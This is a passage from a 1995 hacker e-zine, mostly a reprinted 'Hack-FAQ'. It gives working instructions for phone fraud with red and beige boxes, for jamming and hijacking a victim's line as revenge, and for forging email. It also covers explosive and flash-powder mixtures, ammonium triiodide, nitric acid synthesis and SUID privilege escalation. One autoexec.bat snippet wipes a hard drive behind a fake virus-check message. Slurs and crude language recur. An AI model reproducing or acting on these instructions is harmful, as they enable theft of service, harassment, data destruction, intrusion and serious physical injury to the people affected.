Copy Link
Add to Bookmark
Report

Hackers Issue 03

eZine's profile picture
Published in 
Hackers
 · 2 Jul 2020


  
* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, October, 1995

Edited by: Revolution


Table Of Contents

From the Editor . . . . . . . . . . . . . . . . . . . . . . . . Revolution

The Hack-FAQ 2.06. . . . . . . . . . . . . . . . . . . Beliasarius and N P

The Pursuit of Knowledge, Notes on the Guild. . . . . . . . . . . . Route

The LACC Mailing List . . . . . . . . . . . . . . . . . . .Julian Assange

2600 Meetings . . . . . . . . . . . . . . . . . . . . . . . . . . . FuSIoN

Billwatch #18 . . . . . . . . . . . . . . Voters Telecommunications Watch

A VMS Login Spoof . . . . . . . . . . . . . . . . . . . . . . . Talonphish

Remote Host Probing. . . . . . . . . . . . . . . . . . . . . . . . IOERROR

The End . . . . . . . . . . . . . . . . . . . . . . . . . . . . Revolution


----------------------------------------------------------------- -----------
copyright 1995 by Mike Scanlon All articles remain the property of their
authors, and may be reprinted with their permission. This zine may be
reprinted freely as a whole electronically, for hard copy rights mail the
editor. HACKERS is published monthly by Mike Scanlon, to be added to the
subscription list or to submit articles mail scanlonr@delphi.com
----------------------------------------------------------------- -----------
* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #1 of 9

From the Editor


An amazing amount of things have gone on here at Hackers since last
issue. I started college at NJIT, so you might notice that this issue is
coming from a different address. I've kept my email address the same for
the time being, although if you send anything to mrs3691@hertz.njit.edu I
will receive it also. Hackers has a new web page up, where issues are now
browsable in html form at http://hertz.njit.edu/~mrs3691. There are no
graphics up as of yet, so don't expect anything much.

NJIT is located in Newark New Jersey, so I'm local to all of NYC. If
any of you attend the 2600 meetings in the Citicorp building, plan on seeing
me there in the future.

Alas, due to the increased workload, I've had to diminish my net
presence in recent weeks, but as I adjust I'll probably be on a little more.
In the near future, in fact, my comp sci class might set up a telnetable
BBS, so look for some cool things from that.

When I started this issue, I thought it might suffer because I did
not have enough time to put into it, but a few good submissions turned that
around. This month we have an essay on the guild from it's founding member,
a login spoof you can use with last month's VMS hacking article, and a couple
other cool articles. The Hack-FAQ, although a good source of info for
beginning hackers, is more of a sentimental article due to some things that
have been happening in the old ISCA crowd, such as the return of it's editor
to the scene, and the prospective return of a few other old friends. Also,
I'd like to take this chance to recommend everyone to subscribe to Billwatch.
Although issues of it have been cropping up in here for the last few issues,
if this is your only source of it, you are missing some very good
information. This issue it has some very good info on the state of the
cryptography debate, which I think everybody should take at least a glance
at, so I decided to include it once again.

Anyway, as always I've got to go and do some homework, so I hope you
like this issue.

- Revolution

* * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies. All of these articles are
provided for informational purposes only, Mike Scanlon and the respective
authors cannot be held accountable for any illegal acts they are used to
commit.

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #2 of 9

+---------------+
| THE HACK-FAQ! |
| Edition 2.06 |
| 14 FEB 1994 |
+---------------+



"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop



<*> Edited by <*>


# Editor-in-Chief #
Belisarius <belsarus@cybernet.cse.fau.edu>

# Asst. Editor #
Neurophire (on Shadow and N P on ISCA)







A MatrixMage Electronic Publication
With help from some members of KARMA/K.R.A.





Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>

Faunus Revolution
Matrixx Amarand
Beelzebub Redbeard
IO CyberSorceror
Doktor Nil Skipster
CPT Ozone Abort
Carsenio




Hi there, Hackers and Newbies alike!

We have compiled this, THE HACK-FAQ!, for all of you out there.
Please if you have any suggestions, contributions, criticisms,
whatever, mail at the above addresses.

You might be wondering...where did edition 2.05 go? Well before I
could get it out I got in a lot more good shit and decided to update
it again before sending it out. To receive a copy of THE HACK-FAQ!
via E-mail then send E-mail to me at the address above.

THE HACK-FAQ! is a roughly monthly update and I am currently looking
for a site with LISTSERV capabilities.

Thanks and keep hacking! Remember to keep working and to always try to
educate yourself and gather information. If you're a newbie then read
THE HACK-FAQ! first and use it as a springboard to start from. If
you're a hacker then please contribute to this document.

-=> Belisarius <=-

Hey, to the CrackerJack crowd, keep struggling!! You can make it above,
that's what I am beginning to do! There is hope! :)
])> Neurophyre <([


Distribution of THE HACK-FAQ! is encouraged and promoted, as long as it
is distributed as the entire file. Keep up with latest editions.
Look for the latest edition of THE HACK-FAQ! in every KARMA/K.R.A.
Irregular Zine.

THE HACK-FAQ! is (c) of MatrixMage(tm) Publications.

MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre, or any contributor
are not responsible for any consequences. You use this information at
your own risk.









***************************************************************** ****
CONTENTS

Sections
I. Phone Fun (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc)
II. Fake E-Mail
III. Salting Vending Machines
IV. Explosives
V. Virii
VI. UNIX Passwords
VII. Phucking with MS-DOS
VIII. Cracking programs
IX. PGP / Data Encryption
X. Chemistry (drugs and explosive/pyrotechnic component prep)
XI. 'Cyberpunk'/Futuristic/Underground Culture

Appendices
A. FTP sites with useful info
B. Interesting Gophers
C. Informative USENET Newsgroups
D. Publications and Catalogs
E. PGP Key Appendix

***************************************************************** ****

================================================================= ====
I. Phone Fun

WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)

First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.

What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 Mhz from Digikey, address
below)
- A solder gun.
- Someone who can point out the crystal in the Tone
Dialer.

Instructions:
1) Open up the back of the tone dialer. Use screwdriver.

2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 Mhz one you bought, but otherwise
vaguely similar. It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.

3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.

4) Attach 6.5 Mhz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 Mhz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.

5) Put cover back on. you are done.


How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.

To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.

----------------------------------------------------------------- ----

WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.

----------------------------------------------------------------- ----

WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)

----------------------------------------------------------------- ----

WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key. Call 1-800-DIGIKEY
(1-800-344-4539) for more info. The part order number from
DIGI-KEY is x-415-ND

----------------------------------------------------------------- ----

WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *s

Here are the freq's for a red box:

$.25 1700Hz & 2200Hz for a length of 33 milliseconds for each pulse
with 33 millisecond pause between each pulse
$.10 1700Hz & 2200Hz 2 pulses at 66 milliseconds and with 66
millisecond pauses
$.05 one pulse at the above freq's for 66 milliseconds!

----------------------------------------------------------------- ----

HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
is a general term for Customer owned or "Bell-independent" phone
companies. Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.

----------------------------------------------------------------- ----

FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free. Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free. OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.

----------------------------------------------------------------- ----

HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
clips, ratchet wrench, 7/16-inch hex head

1. Cut off the head on one end of the phone cord.
2. Strip the coating.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
(that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
things sticking about 3 feet out of the ground with a Bell logo on
the front. If you're a retard, you'll waste your time with a
cable company box or something. I've heard of it.
8. Come back to a secluded one at night. With the wrench, open it
up.
9. Find a set of terminals (look like the scored [the "screwy end"]
end of bolts in my area) with what should be a red wire and a
green wire coming off them.
10. Plug in your beige box red to red and green to green, pick up the
phone and dial away!

Modems work too as well as taps and shit. You're using someone
else's line (unless you're an idiot) to get phone service. Don't
abuse the same line after the phone bill comes.

----------------------------------------------------------------- ----

BEIGE BOXING 101
Phield Phreaking
by Revolution

At the beginning of the section in the Bell training manual
entitled "One million ways to catch and phry a phreak" it dosen't
have a disclaimer saying "for informational purposes only". So why
the hell should I put one here? Give this phile to whoever the fuck
you want, just make sure it all stays together, same title, same
byline.

Phield phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hitek revenge, anything
you can do from your own fone line and more, without paying for it,
or being afraid of being traced. Just be ready to bail if you see
sirens.

How to make a beige box: Easiest box to make. Cut your fone cord
before the jak, strip the wires a little. You should see a red
(ring) wire and a green (tip) wire. If you see yellow and black
wires too just ignore them. Put one set of alligator clips on the
red wire and one on the green wire, and you're set. (You want to
use your laptop computer, but you don't want to ruin your modem's
fone cord? Just unscrew a jak from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a fone,
laptop, your mom, anything you can plug in a jak.)

How to use: What you have is a lineman's handset. You can use it
from any bell switching apparatus (from now on sw. ap.). These are
on fone poles, where your fone line meets your house, and near
payfones. I'll go into detail below, but basically just open any
box on a telefone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a fone
jak. These screws are where you need to attach your alligator
clips to get a dial tone. Don't unscrew the screw, you'll just
phuck up some poor guys line, and increase your chances of getting
caught. After the wire goes around the screw, it normally twists
off into the air. Put your clip on the end of the wire. Do the
same with the other clip. If you don't get a dial tone, then
switch terminals.

On telefone poles:

TTI terminals: These must have been built by phreaks, just for
beige boxing. By far the easiest sw. ap. use. The only drawback
is that they only connect to one fone line. These are the fist
sized gray or black boxes that appear where a single fone line
meets the mother line. They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front. No bolts or screws to take
off, just snap up the top and you will see four screws. Clip in
and happy phreaking. Just click the top down and no one will ever
know you were there (except for the extra digits on their fone
bill.)

Green trees: just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it. These are the 3 foot high green/gray metal columns that are no
wider than a telefone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign. Usually green
trees are right at the base of fone poles, or within a foot or two
of them. These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off. Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be. Ratchet this one off and the metal
sheet will swing open like a door. On one side of the sheet will
be a paper with a list of #'s this tree connects to. Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way. The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.

Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide. They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts. I wouldn't open it, but with a little info
from phriends and some social engineering, I learned that inside is
where two underground fone lines are spliced together. Also inside
is either pressurized gas or gel. Pretty messy.

Bell canisters: attached to fone poles at waist level. They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off. Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.

Mother load: Largest sw. ap. A large gray green box, like 6x4,
attached to a telefone pole about three feet off the ground. a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
cabinet with double doors. Fasteners are located in the center of
the box and on the upper edge in the center. Both of these are
held on with a 7/16 bolt. Take the bolts off, and swing the doors
open. On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to. And in the box are the terminals. Normally 1,000
fones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 fones the box connects
too).

On houses: follow the fone line to someone's house, and then down
there wall. Either it goes right into there house (then you're
screwed) or it ends in a plastic box. The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off. Inside are 4 terminals, yellow,
black, and red and green, the two you need. Find the Christmas
colors, and phreak out.

On payfones: follow the fone line up from the fone, and sometimes
you'll find a little black box with two screws in it. Undo this,
and you'll find a nice little fone jak. You don't even need your
beige box for that one. If there's not one of those,
follow the
wire to a wall it goes into, and sometimes there'll be a sw. ap.
like those on houses (see above). Payfones are normally pretty
secure now though, and you probably won't find any of those.

Phreaky things you can do: Jesus, do I have to tell you L/-\m3rs
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.

Hitek revenge!
Possibilities are endless, you have total control of this lamers
line. Most of you guys are probably way to 3l33+ for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something alot better: Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telefone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two termianls with a paper clip, alligator clip, even
your mother's pussylips! His fone will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank: Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (asshole's
#)"

That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi. Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, email revolution@delphi.com no PGP needed.

----------------------------------------------------------------- ----

HOW CAN YOU INTERCEPT CELLULAR PHONE CONVERSATIONS?
(from CPT Ozone)
You can intercept most cellular phone signals on any old radio that
pulls in police and air bands? Look for them at garage sales and
junk yards.

----------------------------------------------------------------- ----

WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)

This service is called ANI.

This number may not work, but try it anyway:
(800) 825-6060

You might want to try is dialing 311 ... a recorded message tells you
your phone #. Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.

----------------------------------------------------------------- ----

HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference. Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line. Then call
and set up a teleconference for whenever to be billed to the line
you are calling from. You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to chhose the number of
ports for your conference call, and how to dial each participant..

================================================================= ====
II. Fake E-mail

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL SMTP)?
(from Beelzebub, Doktor Nil)

1. Telnet to port 25 of any internet server (eg oberlin.edu 25)
2. If at all possible, AVOID TYPING "HELO". Type mail from:(fake name)
3. Type rcpt to:(person who gets mail)
4. The mail server should ok each time after each name.
5. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
6. Retype the commands, it should say ok now.
7. Type data
8. Enter your letter
9. To send letter type a "." on an empty line.
10. Then type quit
11. This is traceable by any sysadmin ... don't harass people this
way.
12. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
"Apparently-To:(name)" even if not, most people wouldn't know
what it means anyway.
13. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any addons the
mail routine might try
14. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the program
probably won't add them on.
15. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.

================================================================= ====
III. Salting vending machines

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

================================================================= ====
IV. Explosives

FLASH POWDERS:
(from Neurophyre)


Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.

REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide (if you can find
1 part by weight aluminum powder regular antimony sulfide
contact Neurophyre!)

Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder


*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.

----------------------------------------------------------------- ----

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

================================================================= ====
V. Virii

WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria. [number not available - :( ]
You can't get busted for anything having to do with this BBS.

Problem: They demand a virus they don't have in their archives to
let you in. Good luck finding one. The best way is to write one,
even if it's in BASIC. It'll probably get you in. They have
THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.

----------------------------------------------------------------- ----

INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer

for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sectornubmer, bits 6,7=cylindernumber(high 2 bits),
0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.

================================================================= ====
VI. Unix

HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:


userid:password:userid#:groupid#:GECOS field:home dir:shell


What each of these fields mean/do---

userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.

password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run thru the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.

userid# -=> a unique number assigned to each user, used for
permissions

groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group

GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.

home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)

shell -=> this is the name of the shell which is
automatically started for the login

Note that all the fields are separated by colons in the passwd file.

----------------------------------------------------------------- ----

WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!

----------------------------------------------------------------- ----

WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.

USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.

================================================================= ====
VII. Phucking with MS-DOS

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.

----------------------------------------------------------------- ----

WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexc.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt

This prevents any output from Wipe being output.


================================================================= ====
VIII. Cracking Programs

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.

----------------------------------------------------------------- ----

WHERE CAN I GET THESE PROGRAMS?
(from Redbeard)
Crack , CrackerJack, and COPS at
ftp plaza.aarnet.edu.au
in the /secutiry/cert directory

WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.

----------------------------------------------------------------- ----

WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It's
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.
Look for it at ftp plains.nodak.edu

================================================================= ====
IX. PGP / Data Encryption

WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won't get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh....sensitive manner.

----------------------------------------------------------------- ----

WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
--------------------------------------------------------------

========
Unix PGP
========

Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z

Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z

Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z

Host dutepp0.et.tudelft.nl
Location: /pub/Unix/Security
FILE -rw-rw-r-- 651826 Oct 4 12:40 pgp22.tar.Z

Host isy.liu.se
Location: /pub/misc/pgp/2.2
FILE -rw-r--r-- 651826 Mar 10 1993 pgp22.tar.Z

Host lhc.nlm.nih.gov
Location: /pub/hunter
FILE -rw-r--r-- 651826 Jun 30 00:00 pgp22.tar.Z


==========
MS-DOS PGP
==========

Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip

Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip

Host pc.usl.edu
Location: /pub/msdos/crypto
FILE -rw-r--r-- 65160 Sep 1 15:42 pgpshe22.zip

Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip

Host plaza.aarnet.edu.au
Location: /micros/pc/garbo/pc/crypt
FILE -r--r--r-- 65430 Aug 3 11:40 pgpshe22.zip
Location: /micros/pc/oak/security
FILE -r--r--r-- 65160 Aug 9 20:00 pgpshe22.zip


=======
Mac PGP
=======

Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx

Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx

Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx

================================================================= ====
X. CHEMISTRY
(from Neurophire)

/*\*/*\*/*\*/*\*/*\*/*\*/ COMING SOON /*\*/*\*/*\*/*\*/*\*/*\*/

How to cheaply make Potassium Chlorate! Easily! KClO3 is an
ingredient in some plastic explosives and in unstable flash powders,
as well as incendiary powders, bricks, and quick and dirty smoke mix!


HOW TO MAKE NITRIC ACID:

Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)

There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

Materials: Equipment:
---------- ----------
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod

collecting flask with
stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.

3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.

4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.

Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one litre of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.

================================================================= ====
XI. 'Cyberpunk'/Futuristic/Underground Culture

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world." --Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped culture. Some who may read this will see some
of their undefined beliefs, hopes and feelings reflected in the above
quote. And, as the quote says, they will help spread it. Somewhere,
somehow, that quote will change the world.

================================================================= ====
Appendix A. FTP sites with useful info:

ftp.eff.org
wiretap.spies.com
hpacv.com (mail postmaster@hpacv.com for info phirst)
phred.pc.cc.cmu.edu
quartz.rutgers.edu
uglymouse.css.itd.umich.edu
grind.isca.uiowa.edu
zero.cypher.com
cert.sei.cmu.edu
plains.nodak.edu
etext.archive.umich.edu
ftp bongo.cc.utexas.edu /pub/mccoy/computer-underground/
black.ox.ac.uk Dictionaries
ftp.win.tue.nl
world.std.com
clr.nmsu.edu
